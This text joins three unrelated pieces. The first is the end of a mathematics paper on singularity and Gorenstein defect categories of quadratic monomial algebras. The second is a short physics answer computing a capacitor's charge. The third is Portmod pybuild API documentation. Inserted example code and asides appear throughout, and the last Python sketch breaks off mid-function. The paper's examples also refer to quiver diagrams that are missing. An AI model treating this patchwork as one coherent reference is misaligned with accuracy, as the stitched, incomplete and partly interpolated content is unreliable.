Lemma 5.2 Keep the notation as above. Then the following statements hold:

(1) There is a triangle equivalence Dsg(B)≃Bperf-mod̲×Dsg(Bdef).

(2) There is a triangle equivalence B-Gproj̲≃Bperf-mod̲, which is triangle equivalent to a product of categories Tn.

(3) There is a triangle equivalence Ddef(B)≃Dsg(Bdef), which is triangle equivalent to (L((Qdef)0)-grproj,(−1)).

Proof We observe that the algebra Bperf is self-injective and that Bac has finite global dimension. Then (1) is a consequence of the decomposition Dsg(B)=Dsg(Bperf)×Dsg(Bac)×Dsg(Bdef) of categories. For (2), we note that any Bperf-module is Gorenstein-projective and that a Gorenstein-projective Bac-module is necessarily projective. By [11, Theorem 1.1], any Gorenstein-projective Bdef-module is projective. Then (2) follows by a similar decomposition of B-Gproj̲. The last statement of (2) follows from Example 5.1, since Bperf is isomorphic to a product of algebras of the form kZn/J2. By (1) and (2), the functor GB:B-Gproj̲→Dsg(B) is identified with the inclusion. The required triangle equivalence in (3) follows immediately. The last part of (3) follows by combining [10, Proposition 4.2] and [13, Theorem 6.1]; compare [10, Theorem B] and [27, Theorem 5.9].□

In what follows, let A=kQ/I be a quadratic monomial algebra with RA its relation quiver. We denote by {C1,C2,…,Cm} the set of all the perfect components in RA, and by di the number of vertices in the basic cycle Ci.
Let B=kRA/J2 be the algebra with radical square zero defined by RA. We consider the triangle equivalence Φ:Dsg(A)→Dsg(B) obtained in Theorem 4.5. We identify the fully faithful functors GA and GB as inclusions. The following result describes the singularity category and the Gorenstein defect category of a quadratic monomial algebra. We mention that the equivalence in Proposition 5.3(2) is due to [12, Theorem 5.7], which is obtained by a completely different method.

Proposition 5.3 The triangle equivalence Φ:Dsg(A)→Dsg(B) restricts to a triangle equivalence A-Gproj̲→∼B-Gproj̲, and thus induces a triangle equivalence Ddef(A)→∼Ddef(B). Consequently, we have the following triangle equivalences:

(1) Dsg(A)→∼A-Gproj̲×Ddef(A);

(2) A-Gproj̲→∼Bperf-mod̲→∼Td1×Td2×⋯×Tdm;

(3) Ddef(A)→∼Dsg(Bdef)→∼(L(Q′)-grproj,(−1)) with Q′=(RAdef)0.

Proof Recall from the proof of Theorem 4.5 that Φ(Aα)=Sα for each arrow α in Q. By [12, Lemma 5.4(1)], the A-module Aα is non-projective Gorenstein-projective if and only if α, as a vertex, lies in a perfect component of RA. Moreover, any indecomposable non-projective Gorenstein-projective A-module arises in this way. On the other hand, any indecomposable non-projective Gorenstein-projective B-module is of the form Sα with α in RAperf; see Lemma 5.2(2). It follows that the equivalence Φ restricts to the equivalence A-Gproj̲→∼B-Gproj̲. The three triangle equivalences follow immediately from the equivalences in Lemma 5.2.□

We end the paper with examples on Proposition 5.3.

Example 5.4 Let A be a quadratic monomial algebra which is Gorenstein. By [12, Proposition 5.5(1)], this is equivalent to the condition that the relation quiver RA has no defect components; for example, any gentle algebra satisfies this condition. Note that Ddef(A) is trivial. Then we obtain a triangle equivalence Dsg(A)⟶∼Td1×Td2×⋯×Tdm, where the di denote the sizes of the perfect components of RA. This result extends [20, Theorem 2.5(b)]; see also [8].
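As a minimal illustration of these equivalences (this example is ours, not from the text): let A=k[x]/(x2), regarded as kQ/I for Q the quiver with one vertex and one loop α, and I=(α2).

```latex
F = \{\alpha\alpha\}
\;\Longrightarrow\;
R_A = Z_1 \ \text{(one vertex with one loop)}, \ \text{a single perfect component}, \ d_1 = 1,
\\[4pt]
\mathbf{D}_{\mathrm{sg}}\bigl(k[x]/(x^2)\bigr) \;\simeq\; \mathcal{T}_1,
```

which is consistent with the classical picture: k[x]/(x2) is self-injective, so its singularity category is its stable module category, with a unique simple module k satisfying Ω(k)≅k.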
Example 5.5 Let A=k⟨x,y⟩/I be the quotient algebra of the free algebra k⟨x,y⟩ by the ideal I=(x2,y2,yx). Then the relation quiver RA is as follows: The relation quiver has no perfect components. Then we have triangle equivalences Dsg(A)≃Ddef(A)≃(L(RA)-grproj,(−1)). Example 5.6 Consider the following quiver Q and the algebra A=kQ/I with I=(βα,αβ,δγ,γδ,δξ): Its relation quiver RA is as follows: There is one perfect component and one defect component; moreover, we observe (RAdef)0=Z2. Then we have triangle equivalences A-Gproj̲≃T2 and Ddef(A)≃(L(Z2)-grproj,(−1)), which is equivalent to T2; see Example 5.1. Therefore, we have a triangle equivalence Dsg(A)≃T2×T2. Acknowledgements The author thanks the referee for many useful comments, and thanks Dawei Shen and Dong Yang for helpful discussions. The author still remembers that Professor Ragnar-Olaf Buchweitz sent a copy of the masterpiece [7] to him around 10 years ago. Funding This work is supported by the National Natural Science Foundation of China (Nos. 11522113 and 11671245) and the Fundamental Research Funds for the Central Universities. References 1 G. Abrams and G. Aranda Pino, The Leavitt path algebra of a graph, J. Algebra 293 (2005), 319–334. 2 M. Auslander and M. Bridger, Stable module theory, Mem. Amer. Math. Soc. 29 (1997), 246–248. 3 M. Auslander, I. Reiten and S. O. Smalø, Representation Theory of Artin Algebras, Cambridge Studies in Adv. Math. 36, Cambridge University Press, Cambridge, 1995. 4 A. Beligiannis, The homological theory of contravariantly finite subcategories: Auslander–Buchweitz contexts, Gorenstein categories and (co-)stabilization, Commun. Algebra 28 (2000), 4547–4596. 5 A. Beligiannis and M. Marmaridis, Left triangulated categories arising from contravariantly finite subcategories, Commun. Algebra 22 (1994), 5021–5036. 6 P. A. Bergh, D. A.
Jorgensen and S. Oppermann, The Gorenstein defect category, Quart. J. Math. 66 (2015), 459–471. 7 R. O. Buchweitz, Maximal Cohen–Macaulay Modules and Tate Cohomology over Gorenstein Rings, Unpublished Manuscript, 1987. Available at: http://hdl.handle.net/1807/16682. 8 X. Chen, S. Geng and M. Lu, The singularity categories of the cluster-tilted algebras of Dynkin type, Algebr. Represent. Theor. 18 (2015), 532–554. 9 X. W. Chen, Singularity categories, Schur functors and triangular matrix rings, Algebr. Represent. Theor. 12 (2009), 181–191. 10 X. W. Chen, The singularity category of an algebra with radical square zero, Doc. Math. 16 (2011), 921–936. 11 X. W. Chen, Algebras with radical square zero are either self-injective or CM-free, Proc. Amer. Math. Soc. 140 (2012), 93–98. 12 X. W. Chen, D. Shen and G. Zhou, The Gorenstein-projective modules over a monomial algebra, arXiv:1501.02978, Proc. Royal Soc. Edin. Sect. A Math., accepted for publication. 13 X. W. Chen and D. Yang, Homotopy categories, Leavitt path algebras and Gorenstein projective modules, Inter. Math. Res. Not. 10 (2015), 2597–2633. 14 D. Happel, Triangulated Categories in the Representation Theory of Finite Dimensional Algebras, London Math. Soc. Lecture Notes Ser. 119, Cambridge University Press, Cambridge, 1988. 15 D. Happel, On Gorenstein algebras, In: Progress in Math. 95, Birkhäuser Verlag, Basel, 1991, 389–404. 16 A. Heller, Stable homotopy categories, Bull. Amer. Math. Soc. 74 (1968), 28–63. 17 C. Holdaway and S. P. Smith, An equivalence of categories for graded modules over monomial algebras and path algebras of quivers, J. Algebra 353 (2012), 249–260. Corrigendum, J. Algebra 357 (2012), 319–321. 18 M. Hoshino, Algebras of finite self-injective dimension, Proc. Amer. Math. Soc.
112 (1991), 619–622. 19 T. Howard, Complexity classes of modules over finite dimensional algebras, J. Pure Appl. Algebra 219 (2015), 5195–5205. 20 M. Kalck, Singularity categories of gentle algebras, Bull. London Math. Soc. 47 (2015), 65–74. 21 B. Keller and D. Vossieck, Sous les catégories dérivées, C.R. Acad. Sci. Paris, t. 305, Série I (1987), 225–228. 22 D. Orlov, Triangulated categories of singularities and D-branes in Landau–Ginzburg models, Trudy Steklov Math. Inst. 204 (2004), 240–262. 23 C. Psaroudakis, O. Skartsaterhagen and O. Solberg, Gorenstein categories, singular equivalences and finite generation of cohomology rings in recollements, Trans. Amer. Math. Soc. Ser. B 1 (2014), 45–95. 24 D. Quillen, Higher algebraic K-theory I, Springer Lecture Notes in Math. 341, 1973, 85–147. 25 J. Rickard, Derived categories and stable equivalence, J. Pure Appl. Algebra 61 (1989), 303–317. 26 D. Shen, The singularity category of a Nakayama algebra, J. Algebra 429 (2015), 1–18. 27 S. P. Smith, Equivalence of categories involving graded modules over path algebras of quivers, Adv. Math. 230 (2012), 1780–1810. 28 M. Tierney, Categorical Constructions in Stable Homotopy Theory, Lecture Notes in Math. 87, Springer-Verlag, Berlin, Heidelberg, New York, 1969. 29 B. Zimmermann Huisgen, Predicting syzygies over monomial relation algebras, Manu. Math. 70 (1991), 157–182. 30 A. Zimmermann and G. Zhou, On singular equivalences of Morita type, J. Algebra 385 (2013), 64–79. © The Author(s) 2018. Published by Oxford University Press. All rights reserved.
For permissions, please e-mail: journals.permissions@oup.com This article is published and distributed under the terms of the Oxford University Press, Standard Journals Publication Model (https://academic.oup.com/journals/pages/about_us/legal/notices) Journal: The Quarterly Journal of Mathematics, Oxford University Press. Published: Mar 12, 2018
http://clay6.com/qa/45904/a-potential-difference-of-250-volt-is-applied-across-the-plates-of-a-capaci
# A potential difference of $250\; volt$ is applied across the plates of a capacitor of $10\; pF$. Calculate the charge on the plates of the capacitor.

## 1 Answer

Here, $V = 250\;V$ and $C = 10\;pF = 10 \times 10^{-12}\;F = 10^{-11}\;F$.

$Q = CV = 10^{-11} \times 250 = 2.5 \times 10^{-9}\;C$

answered Jun 13, 2014
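The arithmetic can be checked with a few lines of Python (an illustrative check, not part of the original answer):

```python
# Charge on a capacitor: Q = C * V
V = 250        # potential difference in volts
C = 10e-12     # capacitance: 10 pF expressed in farads

Q = C * V      # charge in coulombs, approximately 2.5e-9 C
print(f"Q = {Q:.1e} C")
```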
https://portmod.readthedocs.io/en/stable/dev/pybuild/pybuild.html
# pybuild package ## Module contents The module accessible within pybuilds Note that this module should not be imported outside of pybuild files class pybuild.File(NAME, REQUIRED_USE='', OVERRIDES=[], **kwargs)[source] Bases: object Represents important installed files and their metadata Warning This class has been deprecated as of Portmod 2.4. It will be removed in Portmod 3.0 Parameters NAME: str Name of the file relative to the root of the InstallDir OVERRIDES: Union[str, List[str]] A list of files which this overrides when sorting (if applicable). Can either be in the form of a string containing use-conditionals (note that this does not support files that contain spaces) or a list of files to override. Note that these overridden files are not considered masters and do not need to be present. For archives it determines the order in which the fallback archives will be searched during VFS lookups. REQUIRED_USE: str Requirements for installing this file The default empty string is always satisfied. See Pybuild2.REQUIRED_USE for details on the syntax. class pybuild.InstallDir(PATH, REQUIRED_USE='', PATCHDIR='.', S=None, WHITELIST=None, BLACKLIST=None, RENAME=None, DATA_OVERRIDES='', ARCHIVES=(), VFS=None, DOC=(), **kwargs)[source] Bases: object Represents a directory in the Virtual File System Note that arbitrary arguments can be passed to the constructor, as repositories may make use of custom information. See the repository-level documentation for such information. Warning This class has been deprecated as of Portmod 2.4. It will be removed in Portmod 3.0 Parameters ARCHIVES: List[File] A list of File objects representing VFS archives. These will be searched, in order, during VFS file lookups if the file is not present in the package directories. BLACKLIST: Optional[List[str]] If present, does not install files matching the patterns in this list. fnmatch-style globbing patterns (e.g. 
* and [a-z]) can be used DATA_OVERRIDES: str A list of packages that this InstallDir should override in the VFS This only has a different effect from Pybuild1.DATA_OVERRIDES if multiple PATCHDIRs are set, as it can define overrides for individual PATCHDIRS, while Pybuild1.DATA_OVERRIDES affects all PATCHDIRs. See Pybuild1.DATA_OVERRIDES for details of the syntax. DOC: List[str] A list of patterns matching documentation files within the package This documentation will be installed separately fnmatch-style globbing patterns (e.g. * and [a-z]) can be used. PATCHDIR: str The destination path of the InstallDir within the package’s directory. Defaults to “.”, i.e. the root of the mod directory. If multiple InstallDirs share the same PATCHDIR they will be installed into the same directory in the order that they are defined in the INSTALL_DIRS list. Each unique PATCHDIR has its own entry in the VFS, and its own sorting rules PATH: str The path to the data directory that this InstallDir represents relative to the root of the archive it is contained within. RENAME: Optional[str] Destination path of this directory within the final directory. E.g.: InstallDir("foo/bar", PATCHDIR=".", RENAME="bar") Will install the contents of foo/bar (in the source) into the directory bar inside the package’s installation directory (and also the VFS). REQUIRED_USE: str A list of use flags with the same format as the package’s REQUIRED_USE variable which enable the InstallDir if satisfied. Defaults to an empty string that is always satisfied. S: Optional[str] The source directory corresponding to this InstallDir. Similar function to S for the entire pybuild, this determines which directory contains this InstallDir, and generally corresponds to the name of the source archive, minus extensions. 
This is required for packages that contain more than one source, but is automatically detected for those with only one source if it is not specified, and will first take the value of Pybuild2.S, then the source’s file name without extension if the former was not defined. VFS: Optional[bool] Whether or not this InstallDir gets added to the VFS Defaults to the value of the VFS variable in the profile configuration WHITELIST: Optional[List[str]] If present, only installs files matching the patterns in this list. fnmatch-style globbing patterns (e.g. * and [a-z]) can be used get_files()[source] Generator function yielding file subattributes of the installdir class pybuild.Pybuild1[source] Bases: Pybuild2 Legacy class. Superseded by Pybuild2 Warning This class has been deprecated as of Portmod 2.4. It will be removed in Portmod 3.0 DATA_OVERRIDES = '' A use-reduce-able list of atoms indicating packages whose data directories should come before the data directories of this package when sorting data directories. They do not need to be dependencies. Blockers (atoms beginning with !!) can be used to specify underrides, and use dependencies (e.g. the [bar] in foo[bar]) can be used to conditionally override based on the target atom’s flag configuration. Not included in PMS INSTALL_DIRS: List[InstallDir] = [] The INSTALL_DIRS variable consists of a python list of InstallDir objects. E.g.: INSTALL_DIRS=[ InstallDir( 'Morrowind/Data Files', REQUIRED_USE='use use ...', DESTPATH='.', PLUGINS=[File('Plugin Name', REQUIRED_USE='use use ...')], ARCHIVES=[File('Archive Name')], S='Source Name Without Extension', ) ] Not included in PMS REBUILD_FILES: List[str] = [] Files in the VFS which, if changed, should cause this package to be rebuilt Can include glob-style patterns using the *, ? and [] operators. See https://docs.python.org/3/library/fnmatch.html. Unlike normal fnmatch parsing, wildcards (*) will not match across path separators.
This field can be modified during installation, and will only be used after the package has been installed. TIER = 'a' The Tier of a package represents the position of its data directories and plugins in the virtual file system. This is used to group packages in such a way to avoid having to individually specify overrides whenever possible. The value is either in the range [0-9] or [a-z]. Default value: ‘a’ Tier 0 represents top-level mods such as morrowind Tier 1 is for mods that replace or modify top-level mods. E.g. texture and mesh replacers. Tier 2 is for large mods that are designed to be built on top of by other mods, such as Tamriel Data Tier a is for all other mods. Tier z is for mods that should be installed or loaded last. E.g. omwllf The remaining tiers are reserved in case the tier system needs to be expanded Not included in PMS get_files(typ)[source] Returns all enabled files and their directories Parameters typ (str) – Return type src_install()[source] The src_install function installs the package’s content to a directory specified in Pybuild2.D. The initial working directory is Pybuild2.S, falling back to Pybuild2.WORKDIR if the directory does not exist. The default implementation used when the package lacks the src_install function moves each InstallDir in Pybuild1.INSTALL_DIRS which is not hidden due to an unsatisfied REQUIRED_USE into Pybuild2.D. unpack(archives)[source] Unpacks the given archives into the workdir Uses patool as its backend. Parameters archives (Union[str, Iterable[Union[Source, str]]]) – The list of archives to be unpacked class pybuild.Pybuild2[source] Bases: FullPybuild The class from which all Pybuilds should derive. The name and path of a pybuild declares the package name, category, version and (optionally) revision: {CATEGORY}/{PKG_NAME}-{VER}(-r{REV}).pybuild Categories and package names may contain lower case letters, numbers and hyphens. Versions may contain numbers and dots.
Revisions may only contain numbers (following the -r prefix). (See the PMS for the complete naming scheme.) Note that revisions refer to revisions of the pybuild itself, not the package, and are used to indicate that the way the mod is configured has changed in a way that will impact the installed version. For changes, such as the source files moving, that would not impact a mod that is already installed, you do not need to update the revision. There are certain fields which are defined automatically and may only be available in some scopes:
• Pybuild2.P: All scopes
• Pybuild2.PF: All scopes
• Pybuild2.PN: All scopes
• Pybuild2.CATEGORY: All scopes
• Pybuild2.PV: All scopes
• Pybuild2.PVR: All scopes
• Pybuild2.USE: All scopes except __init__
• Pybuild2.WORKDIR: src_*
• Pybuild2.T: All scopes except __init__
• Pybuild2.D: Pybuild2.src_install()
• Pybuild2.FILESDIR: src_*
• Pybuild2.ROOT: src_*, pkg_*
• Pybuild2.A: src_*, pkg_nofetch
• Pybuild2.UNFETCHED: pkg_nofetch
• Pybuild2.S: src_*
1 Fields which are set automatically and should not be defined in the package file. Described in the table above. A: List[Source] The list of enabled sources 1 Scope: All except __init__ CATEGORY: str The package’s category. 1 E.g. base D: str The full path of the directory where the package is to be installed. 1 Note that this is a temporary directory and not the final install location. Scope: src_install DEPEND: str = '' Build dependencies. The DEPEND field is used to specify packages which need to be installed in order for this package to install correctly. Most mods do not have build dependencies, however mods that require patching using tools external to portmod, or packages that generate content from other sources, will need to include their masters, or the other sources, as build dependencies, to ensure that they are installed prior to the package being installed. Format (both DEPEND and RDEPEND): A list of dependencies in the form of package atoms.
All dependencies should include both category and package name. Versions should also be included if the package depends on a specific version of another mod. It is recommended not to include a version number in the dependency unless it is known that the package will not work with other versions. Ranges of versions can be indicated by prefixing >,<,<=,>= to the atoms. E.g. >=cat/foo-1.0 Specific versions can be indicated by prefixing = (matches version and revision exactly) or ~ (matches version, but allows any revision) to the atoms. E.g. =cat/foo-1.0 Use flag dependencies can be specified in the following manner: • cat/foo[flag] - Indicates that flag must be enabled • cat/foo[flag,flag2] - Indicates that both flag and flag2 must be enabled • cat/foo[!flag] - Indicates that flag must be disabled • cat/foo[flag?] - Indicates that flag must be enabled if it is enabled for this package • cat/foo[!flag?] - Indicates that flag must be disabled if it is enabled for this package Atoms can be surrounded by use-conditionals if they are only dependencies when that use flag is enabled/disabled. E.g. flag? ( cat/foo ) Atoms can be grouped and prefixed by a || operator to indicate that any of the given packages will satisfy the dependency. E.g. || ( cat/foo cat/bar cat/baz ) Note that it is required that the parentheses ( ) are separated from the atoms by whitespace. Packages which cannot be installed at the same time can be marked as blocks using the !! operator. I.e. !!cat/foo indicates that cat/foo cannot be installed at the same time as the current package. DESC: str = '' A short description of the package. It may (depending on options provided) be used in searches. Note that a longer description can be provided in metadata.yaml.
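The use-conditional syntax described above can be illustrated with a toy reducer. This is a simplified sketch, not portmod's actual pybuild.use_reduce: it handles only `flag? ( ... )` groups and flat atoms, and ignores || groups, blockers and version operators.

```python
def reduce_deps(depstr, use):
    """Toy reducer for use-conditional dependency strings.

    Keeps atoms whose surrounding `flag? ( ... )` conditionals are
    satisfied by the enabled-flag set `use`, and drops the rest.
    A `!flag? ( ... )` group is kept when the flag is disabled.
    """
    def parse(tokens):
        out = []
        for tok in tokens:
            if tok == ")":
                return out
            if tok.endswith("?"):
                flag = tok[:-1]
                assert next(tokens) == "(", "conditional must be followed by a group"
                group = parse(tokens)
                # XOR: a `!flag?` group is enabled when flag is *not* set
                if (flag.lstrip("!") in use) != flag.startswith("!"):
                    out.extend(group)
            elif tok == "(":
                out.extend(parse(tokens))  # flatten plain groups
            else:
                out.append(tok)
        return out

    return parse(iter(depstr.split()))
```

For real packages, use pybuild.use_reduce, which also understands the || operator and the other forms documented above.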
DOCS: List[str] = ['README*', 'readme*', 'ReadMe*', 'ChangeLog', 'CHANGELOG*', 'AUTHORS*', 'NEWS*', 'TODO*', 'CHANGES*', 'THANKS*', 'BUGS*', 'FAQ*', 'CREDITS*', 'Doc/*', 'doc/*', 'docs/*', 'Docs/*'] A list of documentation patterns for the default src_install to install using Pybuild2.dodoc FILESDIR: str Path of the directory containing additional repository files Scope: src_* HOMEPAGE: str = '' The URL of the package’s homepage(s). Used for descriptive purposes and included in search results. IUSE: Set[str] = '' A field containing a space-separated list of the use flags used by the package. IUSE should contain all regular use flags used by this package, both local and global. Prefixing the use flags with a + means that the option is enabled by default. Otherwise use flags are disabled by default. Note that you do not need to include TEXTURE_SIZES type flags in IUSE, but USE_EXPAND variables should be included in IUSE. KEYWORDS: str = '' Keywords indicating compatibility. • Existence of the keyword indicates that the mod is stable on that platform. • A ~ in front of the keyword indicates that the mod is unstable on that platform. • No keyword indicates that the mod is untested on that platform. • A - in front of the keyword indicates that the mod is known to not work on that platform. E.g. A package that works on OpenMW but does not on tes3mp: KEYWORDS='openmw -tes3mp' LICENSE: str = '' One or more licenses used by the package. A list of licenses can be found in the licenses directory of the repository. NAME: str = '' Descriptive package name. The package name used for identification is the name used in the filename; however, this name is included when searching for packages. P: Atom The package name and version. 1 E.g.: example-suite-1.0 PATCHES: str = '' A list of patch files stored within the package’s files directory in the repository Note that unlike as specified in the PMS, their paths must be relative to the files directory.
See apply_patch() for details on the supported patch format. PF: Atom The package name with version and revision. 1 E.g.: example-suite-1.0-r1 PN: Atom The package name without version. 1 E.g.: example-suite PR: str The package’s revision 1 E.g. r1 It is equal to r0 if no revision is specified PROPERTIES: str = '' A white-space-delimited list of additional properties of the given pybuild to enable special behaviour. Possible values are given below: • live: Indicates that the pybuild doesn’t have a specific version (e.g. if installing from a git repository branch but not using a specific commit). Live pybuilds should have an empty KEYWORDS list, as stability testing is not meaningful if the upstream source is changing. Live packages must override Pybuild2.can_update_live(). • local: Only used internally to refer to Local mods with generated metadata PV: str The package’s version without revision 1 E.g. 1.0 PVR: str The package’s version and revision 1 E.g. 1.0-r1 RDEPEND: str = '' Runtime dependencies. It is used to specify packages which are required at runtime for this package to function. The format is the same as for DEPEND REQUIRED_USE: str = '' An expression indicating valid combinations of use flags. Consists of a string containing sub-expressions of the form given below. Note that the brackets can contain arbitrary nested expressions of this form, and are not limited to what is shown in the examples below.
• flag must be enabled: flag
• flag must not be enabled: !flag
• If flag1 enabled then flag2 enabled: flag1? ( flag2 )
• If flag1 disabled then flag2 enabled: !flag1? ( flag2 )
• If flag1 disabled then flag2 disabled: !flag1? ( !flag2 )
• Must enable any one or more (inclusive or): || ( flag1 flag2 flag3 )
• Must enable exactly one but not more (exclusive or): ^^ ( flag1 flag2 flag3 )
• May enable at most one: ?? ( flag1 flag2 flag3 )
RESTRICT: str = '' Lists features which should be disabled for this package The following two options are supported: • mirror: The package’s SRC_URI entries should not be mirrored, and mirrors should not be checked when fetching. • fetch: The package’s SRC_URI entries should not be fetched automatically, and the pkg_nofetch function should be invoked if a source cannot be found. This option implies mirror. Note that portmod also supports determining these automatically based on source URIs and licenses, so it is no longer necessary to set them explicitly. mirror is restricted for licenses which are not in the REDISTRIBUTABLE license group (see license_groups.yaml), and fetch is restricted for files which are not redistributable (according to license) and do not have a scheme in their SRC_URI (i.e. just a filename, no https://domain.tld etc.). ROOT: str The full path of the prefix root where packages will be installed Note: This functions as both ROOT and SYSROOT (as defined by PMS section 11.1). Scope: src_*, pkg_* S: Optional[str] = None Specifies the default working directory for src_* functions. The default value (if S is None) is the name (minus extension) of the first source in SRC_URI (after use-conditionals have been evaluated). If this path does not exist, the working directory falls back to WORKDIR. This is also used to determine the base source path used for installing an InstallDir in the default src_install if S is not defined on the InstallDir. SRC_URI: str = '' A list of sources to be fetched. If source files should be renamed, this can be done with the arrow operator as shown in the example below. Sources can be wrapped in use-conditional expressions to prevent certain sources from being downloaded unless certain use flags are set or unset. E.g.: SRC_URI=""" http://mw.modhistory.com/file.php?id=9321 -> FileName-1.0.zip flag?
( https://cdn.bethsoft.com/elderscrolls/morrowind/other/masterindex.zip ) """ Note that if you are renaming files, they should correspond to the original filename as best possible, but should also contain version information of some sort to prevent conflicts with other sources from the same package. That is, if the package is updated, we do not want the updated source name to be the same as a previous source name, even if the source name did not change upstream. T: str Path to a temporary directory which may be used during packaging 1 Scope: All except __init__ TEXTURE_SIZES: str = '' A field declaring the texture size options that the package supports. If only one texture size option is available, this field need not be included. Texture sizes should be numbers representing the size of the texture in pixels. Given that textures are usually two-dimensional, the convention is to use: $$\sqrt{ l \cdot w}$$ E.g.: TEXTURE_SIZES = "1024 2048" This is a special type of USE_EXPAND variable, as use flags are created for its values in the form texture_size_SIZE (in the above example texture_size_1024 and texture_size_2048). These use flags can (and should) be used in the pybuild to enable sources and InstallDirs conditionally depending on whether or not the texture size was selected. Exactly one of these use flags will be enabled when the mod is installed depending on the value of the TEXTURE_SIZE variable in the user’s portmod.cfg. Not included in the PMS UNFETCHED: List[Source] The list of sources which need to be fetched 1 Scope: pkg_nofetch USE: Set[str] Enabled use flags 1 Scope: All except __init__ WORKDIR: str The directory where packaging takes place 1 Scope: src_* can_update_live()[source] Indicates whether or not a live package can be updated. The default implementation just returns False. If the package has live in its PROPERTIES, it must implement this method. 
Return type bool Returns If the package has PROPERTIES="live" and can be updated, should return True Otherwise, should return False dodoc(pattern)[source] Installs documentation matching the given pattern into the image directory (Self.D) Parameters pattern (str) – A pattern which can include glob-style wildcards as implemented by glob. static execute(command, pipe_output=False, pipe_error=False)[source] Allows execution of arbitrary commands at runtime. Command is sandboxed with filesystem and network access depending on the context in which it is called Parameters Return type get_installed_env()[source] Returns a dictionary containing installed object values info(string)[source] Displays info message both immediately, and in the summary after all transactions have been completed Parameters string (str) – String to display pkg_postinst()[source] Function called immediately after package installation In Pybuild1, this function has full write permissions to ROOT. In Pybuild2 it only has read permissions. Note that the default does nothing, and it will not even be executed unless defined. pkg_prerm()[source] Function called immediately before package removal In Pybuild1, this function has full write permissions to ROOT. In Pybuild2 it only has read permissions. Note that the default does nothing, and it will not even be executed unless defined. pkg_pretend()[source] May be used to carry out sanity checks early on in the install process Note that the default does nothing, and it will not even be executed unless defined. pkg_pretend is run separately from the main phase function sequence, and does not participate in any kind of environment saving. There is no guarantee that any of an package’s dependencies will be met at this stage, and no guarantee that the system state will not have changed substantially before the next phase is executed. pkg_pretend must not write to the filesystem and the initial working directory should not be expected to be consistent. 
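The dodoc behaviour described above can be approximated with the standard library. This is a hedged sketch: the function name and the usr/share/doc destination layout are assumptions for illustration, not portmod's actual implementation.

```python
import glob
import os
import shutil

def dodoc_sketch(srcdir, image_dir, pattern, docdir="usr/share/doc"):
    """Copy files matching a glob-style pattern from the source tree
    into the image directory, roughly what a dodoc helper does."""
    dest = os.path.join(image_dir, docdir)
    os.makedirs(dest, exist_ok=True)
    installed = []
    for path in sorted(glob.glob(os.path.join(srcdir, pattern))):
        if os.path.isfile(path):
            shutil.copy2(path, dest)  # preserves mtime, like an installer would
            installed.append(os.path.basename(path))
    return installed
```

In a real pybuild you would simply call self.dodoc(pattern), which installs into Pybuild2.D for you.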
src_install()[source] The src_install function installs the package’s content to a directory specified in Pybuild2.D. The initial working directory is Pybuild2.S, falling back to Pybuild2.WORKDIR if the directory does not exist. The default implementation used when the package lacks the src_install function shall behave as: for pattern in self.DOCS: self.dodoc(pattern) src_prepare()[source] The src_prepare function can be used for post-unpack source preparation. The initial working directory is Pybuild2.S, falling back to Pybuild2.WORKDIR if the directory does not exist. The default implementation used when the package lacks the src_prepare function shall behave as: if self.PATCHES: for patch in use_reduce(self.PATCHES, self.USE, flat=True): path = os.path.join(self.FILESDIR, patch) apply_patch(path) src_unpack()[source] The src_unpack function extracts all of the package’s sources. The initial working directory must be self.WORKDIR, and the default implementation used when the package lacks the src_unpack function shall behave as: self.unpack(self.A) unpack(archives)[source] Unpacks the given archives into the workdir Uses shutil.unpack_archive() as its backend, supporting the following archive formats: - .zip - .tar - .tar.gz / .tgz - .tar.bz2 / .tbz2 - .tar.xz / .txz Parameters archives (Union[str, Iterable[Union[Source, str]]]) – The list of archives to be unpacked validate()[source] (Since Portmod 2.4) inquisitor will call this function when scanning repositories. Only code that would be valid in the package global scope (see Sandbox) may be used. This is designed to allow basic structural checks without hindering package loading. It differs from Pybuild2.pkg_pretend() in that it is meant for static checks, not runtime checks.
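The default src_unpack above boils down to shutil.unpack_archive. A minimal standalone equivalent (the function name here is illustrative, not portmod API):

```python
import os
import shutil

def unpack_sketch(archives, workdir):
    """Extract each archive into workdir, mirroring the default
    src_unpack described above. shutil.unpack_archive infers the
    format (.zip, .tar, .tar.gz, .tar.bz2, .tar.xz) from the name."""
    os.makedirs(workdir, exist_ok=True)
    for archive in archives:
        shutil.unpack_archive(archive, workdir)
```

Inside a pybuild, the equivalent call is self.unpack(self.A), which also handles Source objects rather than plain paths.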
warn(string)[source]
Displays a warning message both immediately and in the summary after all transactions have been completed.
Parameters: string (str) – String to display

pybuild.apply_patch(patch)[source]
Applies a patch using git apply.
Patch files must be in a format that can be applied via git apply. Such patches can be produced with git diff --no-index ORIG NEW. The --binary option can be used to produce binary diffs for non-text files.
Patches must be self-applying, i.e. they should not rely on paths being passed to git apply, and must apply from the default working directory in src_prepare.
It is recommended that a comment header is included to describe what the patch does, where it's from, etc.
Parameters: patch (str) – Path to the patch to be applied

pybuild.find_file(name)[source]
Locates the path of a file within the OpenMW virtual file system.
Warning: This function has been deprecated as of Portmod 2.4. It will be removed in Portmod 3.0.
Parameters: name (str) – The relative path within the VFS to search for
Return type: str
Returns: The absolute path of the file

pybuild.get_masters(file)[source]
Detects masters for the given file.
Warning: This function has been deprecated as of Portmod 2.4. It will be removed in Portmod 3.0.
Parameters: file (str) – File to be examined
Return type
Returns: A set of all the master names

pybuild.list_dir(name)[source]
Locates all paths of files matching the given pattern within the OpenMW virtual file system.
Warning: This function has been deprecated as of Portmod 2.4. It will be removed in Portmod 3.0.
Parameters: name (str) – The relative path of the directory within the VFS
Return type
Returns: A list of files contained within the directory

pybuild.patch_dir(src, dst, *, overwrite=True, ignore=None, case_sensitive=True, move_function=<function _move2>)[source]
Copies src on top of dst.
Parameters
Raises
Return type: str
Returns: dst

pybuild.use_reduce(depstr, uselist={}, masklist={}, matchall=False, excludeall={}, is_src_uri=False, opconvert=False, flat=False, is_valid_flag=None, token_class=None, matchnone=False)[source]
Takes a dep string and reduces the use? conditionals out, leaving an array with subarrays. All redundant brackets are removed. Adapted from portage's use_reduce.
Parameters
Return type: List
Returns: The use-reduced depend array

pybuild.version_gt(version1, version2)[source]
Version comparison function.
Parameters
Return type: bool
Returns: True if and only if version1 is greater than version2
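As a rough illustration of the flat=True behaviour of use_reduce, here is a toy model that handles only simple, non-nested use? conditionals. This is my own simplified sketch: the real portage-derived function also supports ||-groups, negated flags, masking, and arbitrary nesting:

```python
# Toy model of use_reduce with flat=True: "flag? ( ... )" groups are kept or
# dropped according to the enabled USE flags, and the brackets are removed.
def toy_use_reduce(depstr, uselist=frozenset()):
    tokens = depstr.split()
    out, i = [], 0
    while i < len(tokens):
        tok = tokens[i]
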